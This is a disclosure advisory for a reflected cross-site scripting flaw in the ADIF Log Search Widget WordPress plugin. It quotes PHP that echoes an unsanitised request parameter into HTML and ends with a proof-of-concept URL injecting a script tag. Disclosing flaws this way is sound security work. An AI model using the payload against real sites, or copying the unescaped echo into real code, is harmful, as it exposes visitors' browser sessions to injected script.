ADIF Log Search Widget version 1.0e suffers from a cross site scripting vulnerability.
bf0e8effce0aa1d22148afab86ac617ac9aa5103faece658ec9c15fcadf7e673# Exploit Title: ADIF Log Search Widget XSS Arbitrary Vulnerability
# Google Dork:
# Date: 26/05/13
# Exploit Author: k3170makan
# Vendor Homepage: http://wordpress.org/plugins/adif-log-search-widget/
# Software Link: http://wordpress.org/plugins/adif-log-search-widget/
# Version: 1.0e
# Tested on: Ubuntu 12.04.2 LTS
Wordpress ADIF log book search plugin widget suffers from a Cross Site
Scripting vulnerability.
Code: logbook_search.php
-------------------------------------------------------------------------------------------------------------------
55 echo "
56 <div id=\"logbook_poplight\" class=\"logbook_poplight\"
title=\"$num_rows QSO's with ".$_REQUEST['call']."\">";
57 echo "<table>";
58 echo " <tr>";
Code: logbook_search.php
-------------------------------------------------------------------------------------------------------------------
93 else{
94 echo "
95
96 <div id=\"logbook_poplight\" class=\"logbook_poplight\"
title=\"No QSO's with ".$_REQUEST['call']."\">
97 Sorry, nothing found in the logbook!
98 </div>
99 ";
100 logbook_search_form();
101 }
102 }
The above code fails to sanitize the "$_REQUEST['call']" value passed to
the script from the Widgets HTML form, allowing attackers to inject
HTML/JavaScript into a victims browser session.
PoC:
http://[domain]/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://127.0.0.1/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E>
--
<k3170makan
blog="http://blog.k3170makan.com"
src ="https://github.com/k3170makan"
tweets="https://twitter.com/k3170makan"
/>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed